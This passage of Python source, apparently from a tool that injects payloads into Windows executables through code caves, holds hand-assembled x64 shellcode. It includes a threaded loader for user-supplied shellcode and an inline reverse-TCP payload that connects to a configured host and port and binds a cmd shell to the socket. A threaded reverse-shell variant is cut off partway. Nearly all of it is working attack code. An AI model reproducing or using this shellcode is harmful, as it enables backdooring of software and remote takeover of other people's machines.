"\x48\x83\xEC\x20" # sub rsp, 32 ; reserve space for the four register params (4 * sizeof(QWORD) = 32)
# ; It is the callers responsibility to restore RSP if need be (or alloc more space or align RSP).
"\x41\x52" # push r10 ; push back the return address
"\xFF\xE0" # jmp rax ; Jump into the required function
#; We now automagically return to the correct caller...
#get_next_mod: ;
"\x58" # pop rax ; Pop off the current (now the previous) modules EAT
#get_next_mod1: ;
"\x41\x59" # pop r9 ; Pop off the current (now the previous) modules hash
"\x5A" # pop rdx ; Restore our position in the module list
"\x48\x8B\x12" # mov rdx, [rdx] ; Get the next module
"\xe9\x57\xff\xff\xff" # jmp next_mod ; Process this module
)
#allocate
self.shellcode1 += ("\x5d" # pop rbp
"\x49\xc7\xc6" # mov r14, 1abh size of payload...
)
self.shellcode1 += struct.pack("<H", len(self.shellcode2) - 5)
self.shellcode1 += ("\x00\x00"
"\x6a\x40" # push 40h
"\x41\x59" # pop r9 now 40h
"\x68\x00\x10\x00\x00" # push 1000h
"\x41\x58" # pop r8.. now 1000h
"\x4C\x89\xF2" # mov rdx, r14
"\x6A\x00" # push 0
"\x59" # pop rcx
"\x68\x58\xa4\x53\xe5" # push E553a458
"\x41\x5A" # pop r10
"\xff\xd5" # call rbp
"\x48\x89\xc3" # mov rbx, rax ; Store allocated address in ebx
"\x48\x89\xc7" # mov rdi, rax ; Prepare EDI with the new address
)
#mov rcx, 0x1abE
self.shellcode1 += "\x48\xc7\xc1"
self.shellcode1 += struct.pack("<H", len(self.shellcode2) - 5)
self.shellcode1 += "\x00\x00"
#call the get_payload right before the payload
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x43"
# got_payload:
self.shellcode1 += ("\x5e" # pop rsi ; Prepare ESI with the source to copy
"\xf2\xa4" # rep movsb ; Copy the payload to RWX memory
"\xe8\x00\x00\x00\x00" # call set_handler ; Configure error handling
#set_handler:
"\x48\x31\xC0" # xor rax,rax
"\x50" # push rax ; LPDWORD lpThreadId (NULL)
"\x50" # push rax ; DWORD dwCreationFlags (0)
"\x49\x89\xC1" # mov r9, rax ; LPVOID lpParameter (NULL)
"\x48\x89\xC2" # mov rdx, rax ; LPTHREAD_START_ROUTINE lpStartAddress (payload)
"\x49\x89\xD8" # mov r8, rbx ; SIZE_T dwStackSize (0 for default)
"\x48\x89\xC1" # mov rcx, rax ; LPSECURITY_ATTRIBUTES lpThreadAttributes (NULL)
"\x49\xC7\xC2\x38\x68\x0D\x16" # mov r10, 0x160D6838 ; hash( "kernel32.dll", "CreateThread" )
"\xFF\xD5" # call rbp ; Spawn payload thread
"\x48\x83\xC4\x58" # add rsp, 50
#stackrestore
"\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59"
"\x41\x58\x5d\x5f\x5e\x5a\x59\x5b\x58"
)
breakupvar = eat_code_caves(flItms, 0, 2)
#Jump to the win64 return to normal execution code segment.
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip('L')), 16))
else:
self.shellcode1 += "\xE9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
#self.shellcode1 += "\xE9\x47\x02\x00\x00"
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def user_supplied_shellcode_threaded(self, flItms, CavesPicked={}):
"""
User supplies the shellcode, make sure that it EXITs via a thread.
"""
flItms['stager'] = True
if flItms['supplied_shellcode'] is None:
print "[!] User must provide shellcode for this module (-U)"
return False
else:
self.supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
#overloading the class stackpreserve
self.stackpreserve = ("\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50"
"\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
)
breakupvar = eat_code_caves(flItms, 0, 1)
#get_payload: #Jump back with the address for the payload on the stack.
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 272).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 272).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 244).rstrip('L')), 16))
else:
self.shellcode2 = "\xE8\xB8\xFF\xFF\xFF"
#Can inject any shellcode below.
if flItms['NewCodeCave'] is False:
if CavesPicked != {}:
self.shellcode2 += self.clean_caves_stub(flItms['CavesToFix'])
else:
self.shellcode2 += "\x41" * 90
self.shellcode2 += self.supplied_shellcode
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ("\x90" # <--THAT'S A NOP. \o/
"\xe8\xc0\x00\x00\x00" # jmp to allocate
#api_call
"\x41\x51" # push r9
"\x41\x50" # push r8
"\x52" # push rdx
"\x51" # push rcx
"\x56" # push rsi
"\x48\x31\xD2" # xor rdx,rdx
"\x65\x48\x8B\x52\x60" # mov rdx,qword ptr gs:[rdx+96]
"\x48\x8B\x52\x18" # mov rdx,qword ptr [rdx+24]
"\x48\x8B\x52\x20" # mov rdx,qword ptr[rdx+32]
#next_mod
"\x48\x8b\x72\x50" # mov rsi,[rdx+80]
"\x48\x0f\xb7\x4a\x4a" # movzx rcx,word [rdx+74]
"\x4d\x31\xc9" # xor r9,r9
#loop_modname
"\x48\x31\xc0" # xor rax,rax
"\xac" # lods
"\x3c\x61" # cmp al, 61h (a)
"\x7c\x02" # jl 02
"\x2c\x20" # sub al, 0x20
#not_lowercase
"\x41\xc1\xc9\x0d" # ror r9d, 13
"\x41\x01\xc1" # add r9d, eax
"\xe2\xed" # loop until read, back to xor rax, rax
"\x52" # push rdx ; Save the current position in the module list for later
"\x41\x51" # push r9 ; Save the current module hash for later
# ; Proceed to itterate the export address table,
"\x48\x8b\x52\x20" # mov rdx, [rdx+32] ; Get this modules base address
"\x8b\x42\x3c" # mov eax, dword [rdx+60] ; Get PE header
"\x48\x01\xd0" # add rax, rdx ; Add the modules base address
"\x8b\x80\x88\x00\x00\x00" # mov eax, dword [rax+136] ; Get export tables RVA
"\x48\x85\xc0" # test rax, rax ; Test if no export address table is present
"\x74\x67" # je get_next_mod1 ; If no EAT present, process the next module
"\x48\x01\xd0" # add rax, rdx ; Add the modules base address
"\x50" # push rax ; Save the current modules EAT
"\x8b\x48\x18" # mov ecx, dword [rax+24] ; Get the number of function names
"\x44\x8b\x40\x20" # mov r8d, dword [rax+32] ; Get the rva of the function names
"\x49\x01\xd0" # add r8, rdx ; Add the modules base address
#; Computing the module hash + function hash
#get_next_func: ;
"\xe3\x56" # jrcxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
"\x48\xff\xc9" # dec rcx ; Decrement the function name counter
"\x41\x8b\x34\x88" # mov esi, dword [r8+rcx*4]; Get rva of next module name
"\x48\x01\xd6" # add rsi, rdx ; Add the modules base address
"\x4d\x31\xc9" # xor r9, r9 ; Clear r9 which will store the hash of the function name
# ; And compare it to the one we wan
#loop_funcname: ;
"\x48\x31\xc0" # xor rax, rax ; Clear rax
"\xac" # lodsb ; Read in the next byte of the ASCII function name
"\x41\xc1\xc9\x0d" # ror r9d, 13 ; Rotate right our hash value
"\x41\x01\xc1" # add r9d, eax ; Add the next byte of the name
"\x38\xe0" # cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
"\x75\xf1" # jne loop_funcname ; If we have not reached the null terminator, continue
"\x4c\x03\x4c\x24\x08" # add r9, [rsp+8] ; Add the current module hash to the function hash
"\x45\x39\xd1" # cmp r9d, r10d ; Compare the hash to the one we are searchnig for
"\x75\xd8" # jnz get_next_func ; Go compute the next function hash if we have not found it
# ; If found, fix up stack, call the function and then value else compute the next one...
"\x58" # pop rax ; Restore the current modules EAT
"\x44\x8b\x40\x24" # mov r8d, dword [rax+36] ; Get the ordinal table rva
"\x49\x01\xd0" # add r8, rdx ; Add the modules base address
"\x66\x41\x8b\x0c\x48" # mov cx, [r8+2*rcx] ; Get the desired functions ordinal
"\x44\x8b\x40\x1c" # mov r8d, dword [rax+28] ; Get the function addresses table rva
"\x49\x01\xd0" # add r8, rdx ; Add the modules base address
"\x41\x8b\x04\x88" # mov eax, dword [r8+4*rcx]; Get the desired functions RVA
"\x48\x01\xd0" # add rax, rdx ; Add the modules base address to get the functions actual VA
#; We now fix up the stack and perform the call to the drsired function...
#finish:
"\x41\x58" # pop r8 ; Clear off the current modules hash
"\x41\x58" # pop r8 ; Clear off the current position in the module list
"\x5E" # pop rsi ; Restore RSI
"\x59" # pop rcx ; Restore the 1st parameter
"\x5A" # pop rdx ; Restore the 2nd parameter
"\x41\x58" # pop r8 ; Restore the 3rd parameter
"\x41\x59" # pop r9 ; Restore the 4th parameter
"\x41\x5A" # pop r10 ; pop off the return address
"\x48\x83\xEC\x20" # sub rsp, 32 ; reserve space for the four register params (4 * sizeof(QWORD) = 32)
# ; It is the callers responsibility to restore RSP if need be (or alloc more space or align RSP).
"\x41\x52" # push r10 ; push back the return address
"\xFF\xE0" # jmp rax ; Jump into the required function
# ; We now automagically return to the correct caller...
#get_next_mod: ;
"\x58" # pop rax ; Pop off the current (now the previous) modules EAT
#get_next_mod1: ;
"\x41\x59" # pop r9 ; Pop off the current (now the previous) modules hash
"\x5A" # pop rdx ; Restore our position in the module list
"\x48\x8B\x12" # mov rdx, [rdx] ; Get the next module
"\xe9\x57\xff\xff\xff" # jmp next_mod ; Process this module
)
#allocate
self.shellcode1 += ("\x5d" # pop rbp
"\x49\xc7\xc6" # mov r14, 1abh size of payload...
)
self.shellcode1 += struct.pack("<I", len(self.shellcode2) - 5)
self.shellcode1 += ("\x6a\x40" # push 40h
"\x41\x59" # pop r9 now 40h
"\x68\x00\x10\x00\x00" # push 1000h
"\x41\x58" # pop r8.. now 1000h
"\x4C\x89\xF2" # mov rdx, r14
"\x6A\x00" # push 0
"\x59" # pop rcx
"\x68\x58\xa4\x53\xe5" # push E553a458
"\x41\x5A" # pop r10
"\xff\xd5" # call rbp
"\x48\x89\xc3" # mov rbx, rax ; Store allocated address in ebx
"\x48\x89\xc7" # mov rdi, rax ; Prepare EDI with the new address
)
##mov rcx, 0x1ab
self.shellcode1 += "\x48\xc7\xc1"
self.shellcode1 += struct.pack("<I", len(self.shellcode2) - 5)
#call the get_payload right before the payload
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x43"
# got_payload:
self.shellcode1 += ("\x5e" # pop rsi ; Prepare ESI with the source to copy
"\xf2\xa4" # rep movsb ; Copy the payload to RWX memory
"\xe8\x00\x00\x00\x00" # call set_handler ; Configure error handling
#set_handler:
"\x48\x31\xC0" # xor rax,rax
"\x50" # push rax ; LPDWORD lpThreadId (NULL)
"\x50" # push rax ; DWORD dwCreationFlags (0)
"\x49\x89\xC1" # mov r9, rax ; LPVOID lpParameter (NULL)
"\x48\x89\xC2" # mov rdx, rax ; LPTHREAD_START_ROUTINE lpStartAddress (payload)
"\x49\x89\xD8" # mov r8, rbx ; SIZE_T dwStackSize (0 for default)
"\x48\x89\xC1" # mov rcx, rax ; LPSECURITY_ATTRIBUTES lpThreadAttributes (NULL)
"\x49\xC7\xC2\x38\x68\x0D\x16" # mov r10, 0x160D6838 ; hash( "kernel32.dll", "CreateThread" )
"\xFF\xD5" # call rbp ; Spawn payload thread
"\x48\x83\xC4\x58" # add rsp, 50
#stackrestore
"\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59"
"\x41\x58\x5d\x5f\x5e\x5a\x59\x5b\x58"
)
breakupvar = eat_code_caves(flItms, 0, 2)
#Jump to the win64 return to normal execution code segment.
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip('L')), 16))
else:
self.shellcode1 += "\xe9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def iat_reverse_tcp_inline(self, flItms, CavesPicked={}):
"""
Position dependent shellcode that uses API thunks of LoadLibraryA and
GetProcAddress to find and load APIs for callback to C2.
"""
flItms['apis_needed'] = ['LoadLibraryA', 'GetProcAddress']
for api in flItms['apis_needed']:
if api not in flItms:
return False
if self.PORT is None:
print ("This payload requires the PORT parameter -P")
return False
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
self.shellcode1 = "\xfc" # CLD
self.shellcode1 += "\x49\xBE" # mov value below to r14
#Think about putting the LOADLIBA and GETPROCADDRESS in rX regs
if flItms['LoadLibraryA'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) < 0:
self.shellcode1 += struct.pack("<Q", 0xffffffff + (flItms['LoadLibraryA'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) + 1))
else:
self.shellcode1 += struct.pack("<Q", flItms['LoadLibraryA'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']))
#RDX holds entry point
self.shellcode1 += "\x49\x01\xD6" # add r14 + RDX
self.shellcode1 += "\x49\xBF" # mov value below to r15
if flItms['GetProcAddress'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) < 0:
self.shellcode1 += struct.pack("<Q", 0xffffffff + (flItms['GetProcAddress'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) + 1))
else:
self.shellcode1 += struct.pack("<Q", flItms['GetProcAddress'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']))
self.shellcode1 += "\x49\x01\xD7" # add r15 + RDX
#LoadLibraryA in r14
#GetProcAddress in r15
'''
Winx64 asm calling convention
RCX, RDX, R8, R9 for the first four integer or pointer arguments (in that order),
and XMM0, XMM1, XMM2, XMM3 are used for floating point arguments. Additional arguments
are pushed onto the stack (right to left). Integer return values (similar to x86) are
returned in RAX if 64 bits or less. Floating point return values are returned in XMM0.
Parameters less than 64 bits long are not zero extended; the high bits are not zeroed.
The caller reserves space on the stack (unlike x86)
rbx
rbp
r12
r13
r14: GetProcAddress
r15: LoadLibraryA
'''
self.shellcode1 += ("\x49\xbb\x77\x73\x32\x5F\x33\x32\x00\x00" # mov r11, ws2_32
"\x41\x53" # push r11
"\x49\x89\xE3" # mov r11, rsp
"\x48\x81\xEC\xA0\x01\x00\x00" # sub rsp, 408+8 # size of WSAData
"\x48\x89\xE6" # mov rsi, rsp pointer to WSAData struct
"\x48\xBF\x02\x00"
)
self.shellcode1 += struct.pack('!H', self.PORT)
self.shellcode1 += self.pack_ip_addresses()
self.shellcode1 += ("\x57" # push rdi
"\x48\x89\xE7" # mov rdi, rsp pointer to data
"\x4C\x89\xD9" # mov rcx, r11 #ws2_32
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xff\x16" # call qword ptr [r14] ; LoadLibA
"\x49\x89\xC5" # mov r13, rax ; handle ws2_32 to r13
# handle ws2_32 to r13
"\x48\x89\xC1" # mov rcx, rax
"\xeb\x0c" # short jmp over api
"\x57\x53\x41\x53\x74\x61" # WSAStartup
"\x72\x74\x75\x70\x00\x00" # ...
"\x48\x8D\x15\xED\xFF\xFF\xFF" # lea rdx, [rip-19]
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # Call qword ptr [r15] ; GetProcAddr
"\x48\x95" # xchg rbp, rax ; mov wsastartup to rbp
# wsastartup to rbp
"\xeb\x0c" # jmp over WSASocketA
"\x57\x53\x41\x53\x6f\x63" # WSASocketA
"\x6b\x65\x74\x41\x00\x00" #
"\x48\x8D\x15\xED\xFF\xFF\xFF" # lea rdx, [rip-19]
"\x4C\x89\xE9" # mov rcx, r13
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15] GetProcAddr WSASocketA
"\x49\x94" # xchg r12, rax ; mov WSASocketA to r12
# WSASocketA to r12
"\x48\x89\xF2" # mov rdx, rsi ; mov point to struct
"\x68\x01\x01\x00\x00" # push 0x0101
"\x59" # pop rcx
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\xff\xd5" # call rbp ; WSAStartup(0x0101, &WSAData);
"\x50" # push rax
"\x50" # push rax
"\x4D\x31\xC0" # xor r8, r8
"\x4D\x31\xC9" # xor r9, r9
"\x48\xff\xC0" # inc rax
"\x48\x89\xC2" # mov rdx, rax
"\x48\xff\xC0" # inc rax
"\x48\x89\xC1" # mov rdx, rax
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\xD4" # call r12 ;WSASocketA(AF_INT, SOCK_STREAM, 0 0 0 0)
"\x49\x94" # xchg r12, rax ; mov socket to r12
# get connect
"\x48\xBA\x63\x6F\x6E\x6E\x65\x63\x74\x00" # mov rdx, "connect\x00"
"\x52" # push rdx
"\x48\x89\xE2" # mov rdx, rsp
"\x4C\x89\xE9" # mov rcx, r13; ws2_32 handle
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15] ;GetProcAddr connect
"\x48\x89\xC3" # mov rbx, rax ;connect api
"\x6A\x10" # push 16
"\x41\x58" # pop r8
"\x48\x89\xFA" # mov rdx, rdi
"\x4C\x89\xE1" # mov rcx, r12
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\xFF\xD3" # call rbx ;connect (s, &sockaddr, 16)
)
#socket is in r12
#breakupvar is the distance between codecaves
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9" # JMP opcode
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
self.shellcode2 = ("\xeb\x09" # jump over kernel32
"\x6b\x65\x72\x6e\x65\x6c\x33\x32\x00" # kernel32,00
"\x48\x8D\x0D\xF0\xFF\xFF\xFF" # lea rcx, [rip-4]
"\x48\x83\xEC\x20" # sub rsp, 20
"\x41\xFF\x16" # call qword ptr [r14]
# getprocaddress CreateProcessA
"\x49\x89\xC5" # mov r13, rax ; mov kernel32 to r13
"\x48\x89\xC1" # mov rcx, rax
"\xeb\x0f" # jump over CreateProcessA,0
"\x43\x72\x65\x61\x74\x65\x50" # CreateProcessA
"\x72\x6f\x63\x65\x73\x73\x41\x00" # ...
"\x48\x8D\x15\xEA\xFF\xFF\xFF" # lea rdx, [rip - 22]
"\x48\x83\xEC\x20" # sub rsp, 20
"\x41\xFF\x17" # call qword ptr [r15] GetProcAddr CreateProcessA
# CreateProcessesA in rax
"\x48\x89\xC7" # mov rdi, rax ;mov CreateProcessA to rdi
"\x49\x87\xFC" # xchg r12, rdi (socket handle for CreateProcessA)
# socket is in rdi
# shell:
"\x49\xb8\x63\x6d\x64\x00\x00\x00\x00\x00" # mov r8, 'cmd'
"\x41\x50" # push r8 ; an extra push for alignment
"\x41\x50" # push r8 ; push our command line: 'cmd',0
"\x48\x89\xe2" # mov rdx, rsp ; save a pointer to the command line
"\x57" # push rdi ; our socket becomes the shells hStdError
"\x57" # push rdi ; our socket becomes the shells hStdOutput
"\x57" # push rdi ; our socket becomes the shells hStdInput
"\x4d\x31\xc0" # xor r8, r8 ; Clear r8 for all the NULL's we need to push
"\x6a\x0d" # push byte 13 ; We want to place 104 (13 * 8) null bytes onto the stack
"\x59" # pop rcx ; Set RCX for the loop
# 1 push_loop: ;
"\x41\x50" # push r8 ; push a null qword
"\xe2\xfc" # loop push_loop ; keep looping untill we have pushed enough nulls
"\x66\xc7\x44\x24\x54\x01\x01" # mov word [rsp+84], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
"\x48\x8d\x44\x24\x18" # lea rax, [rsp+24] ; Set RAX as a pointer to our STARTUPINFO Structure
"\xc6\x00\x68" # mov byte [rax], 104 ; Set the size of the STARTUPINFO Structure
"\x48\x89\xe6" # mov rsi, rsp ; Save the pointer to the PROCESS_INFORMATION Structure
# ; 1 perform the call to CreateProcessA
"\x56" # push rsi ; Push the pointer to the PROCESS_INFORMATION Structure
"\x50" # push rax ; Push the pointer to the STARTUPINFO Structure
"\x41\x50" # push r8 ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
"\x41\x50" # push r8 ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
"\x41\x50" # push r8 ; We dont specify any dwCreationFlags
"\x49\xff\xc0" # inc r8 ; Increment r8 to be one
"\x41\x50" # push r8 ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
"\x49\xff\xc8" # dec r8 ; Decrement r8 (third param) back down to zero
"\x4d\x89\xc1" # mov r9, r8 ; Set fourth param, lpThreadAttributes to NULL
# ; r8 = lpProcessAttributes (NULL)
# ; rdx = the lpCommandLine to point to "cmd",0
"\x4c\x89\xc1" # mov rcx, r8 ; Set lpApplicationName to NULL as we are using the command line param instead
"\x48\x83\xEC\x20" # sub rsp, 20
"\x41\xFF\xD4" # call r12 ; CreateProcessA( 0, &"cmd", 0, 0, TRUE, 0, 0, 0, &si, &pi );
# perform the call to WaitForSingleObject
"\xeb\x14" # jmp over WaitForSingleObject
"\x57\x61\x69\x74\x46\x6f\x72\x53" # WaitForSingleObject
"\x69\x6e\x67\x6c\x65\x4f\x62\x6a" # ...
"\x65\x63\x74\x00" # ...
"\x48\x8D\x15\xE5\xFF\xFF\xFF" # lea rdx, [rip-27]
"\x4C\x89\xE9" # mov rcx, r13 ; mov kernel32 handle to rcx
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15] GetProcAddr WaitForSingleObject
# WaitForSingleObject is in rax
"\x48\x31\xd2" # xor rdx, rdx
"\x8b\x0e" # mov ecx, dword [rsi] ; set the first param to the handle from our PROCESS_INFORMATION.hProcess
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\xFF\xD0" # call rax; WaitForSingleObject( pi.hProcess, INFINITE );
#Fix Up rsp
"\x48\x81\xC4\x08\x04\x00\x00" # add rsp, 490
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
def iat_reverse_tcp_inline_threaded(self, flItms, CavesPicked={}):
"""
Complete IAT based payload includes spawning of thread.
"""
flItms['stager'] = True
flItms['apis_needed'] = ['LoadLibraryA', 'GetProcAddress',
'CreateThread', 'VirtualAlloc']
for api in flItms['apis_needed']:
if api not in flItms:
return False
if self.PORT is None:
print ("This payload requires the PORT parameter -P")
return False
if self.HOST is None:
print "This payload requires a HOST parameter -H"
return False
#overloading the class stackpreserve
self.stackpreserve = ("\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50"
"\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
)
breakupvar = eat_code_caves(flItms, 0, 1)
#get_payload: #Jump back with the address for the payload on the stack.
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 272).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 272).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 244).rstrip('L')), 16))
else:
self.shellcode2 = "\xE8\xB8\xFF\xFF\xFF"
#Can inject any shellcode below.
if flItms['NewCodeCave'] is False:
if CavesPicked != {}:
self.shellcode2 += self.clean_caves_stub(flItms['CavesToFix'])
else:
self.shellcode2 += "\x41" * 90
self.shellcode2 += "\xfc" # CLD
self.shellcode2 += "\x55\x48\x89\xE5" # push rbp, mov rpp, rsp
self.shellcode2 += "\x48\x31\xD2" # xor rdx, rdx
self.shellcode2 += "\x65\x48\x8B\x52\x60" # mov rdx, QWORD ptr gs: [rdx+0x60]
self.shellcode2 += "\x48\x8B\x52\x10" # mov rdx, Qword ptr [rdx + 10]
# rdx now module entry
self.shellcode2 += "\x49\xBE" # mov value below to r14
if flItms['LoadLibraryA'] - flItms['ImageBase'] < 0:
self.shellcode2 += struct.pack("<Q", 0xffffffff + (flItms['LoadLibraryA'] - flItms['ImageBase'] + 1))
else:
self.shellcode2 += struct.pack("<Q", flItms['LoadLibraryA'] - flItms['ImageBase'])
#RDX holds entry point
self.shellcode2 += "\x49\x01\xD6" # add r14 + RDX
self.shellcode2 += "\x49\xBF" # mov value below to r15
if flItms['GetProcAddress'] - flItms['ImageBase'] < 0:
self.shellcode2 += struct.pack("<Q", 0xffffffff + (flItms['GetProcAddress'] - flItms['ImageBase'] + 1))
else:
self.shellcode2 += struct.pack("<Q", flItms['GetProcAddress'] - flItms['ImageBase'])
self.shellcode2 += "\x49\x01\xD7" # add r15 + RDX
#LoadLibraryA in r14
#GetProcAddress in r15
'''
Winx64 asm calling convention
RCX, RDX, R8, R9 for the first four integer or pointer arguments (in that order),
and XMM0, XMM1, XMM2, XMM3 are used for floating point arguments. Additional arguments
are pushed onto the stack (right to left). Integer return values (similar to x86) are
returned in RAX if 64 bits or less. Floating point return values are returned in XMM0.
Parameters less than 64 bits long are not zero extended; the high bits are not zeroed.
The caller reserves space on the stack (unlike x86)
rbx
rbp
r12
r13
r14: GetProcAddress
r15: LoadLibraryA
'''
self.shellcode2 += ("\x49\xbb\x77\x73\x32\x5F\x33\x32\x00\x00" # mov r11, ws2_32
"\x41\x53" # push r11
"\x49\x89\xE3" # mov r11, rsp
"\x48\x81\xEC\xA0\x01\x00\x00" # sub rsp, 408+8 # size of WSAData
"\x48\x89\xE6" # mov rsi, rsp pointer to WSAData struct
"\x48\xBF\x02\x00"
)
self.shellcode2 += struct.pack('!H', self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x57" # push rdi
"\x48\x89\xE7" # mov rdi, rsp pointer to data
"\x4C\x89\xD9" # mov rcx, r11 #ws2_32
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xff\x16" # call qword ptr [r14] ; LoadLibA
"\x49\x89\xC5" # mov r13, rax ; handle ws2_32 to r13
# handle ws2_32 to r13
"\x48\x89\xC1" # mov rcx, rax
"\xeb\x0c" # short jmp over api
"\x57\x53\x41\x53\x74\x61" # WSAStartup
"\x72\x74\x75\x70\x00\x00" # ...
"\x48\x8D\x15\xED\xFF\xFF\xFF" # lea rdx, [rip-19]
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # Call qword ptr [r15] ; GetProcAddr
"\x48\x95" # xchg rbp, rax ; mov wsastartup to rbp
# wsastartup to rbp
"\xeb\x0c" # jmp over WSASocketA
"\x57\x53\x41\x53\x6f\x63" # WSASocketA
"\x6b\x65\x74\x41\x00\x00" #
"\x48\x8D\x15\xED\xFF\xFF\xFF" # lea rdx, [rip-19]
"\x4C\x89\xE9" # mov rcx, r13
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15] GetProcAddr WSASocketA
"\x49\x94" # xchg r12, rax ; mov WSASocketA to r12
# WSASocketA to r12
"\x48\x89\xF2" # mov rdx, rsi ; mov point to struct
"\x68\x01\x01\x00\x00" # push 0x0101
"\x59" # pop rcx
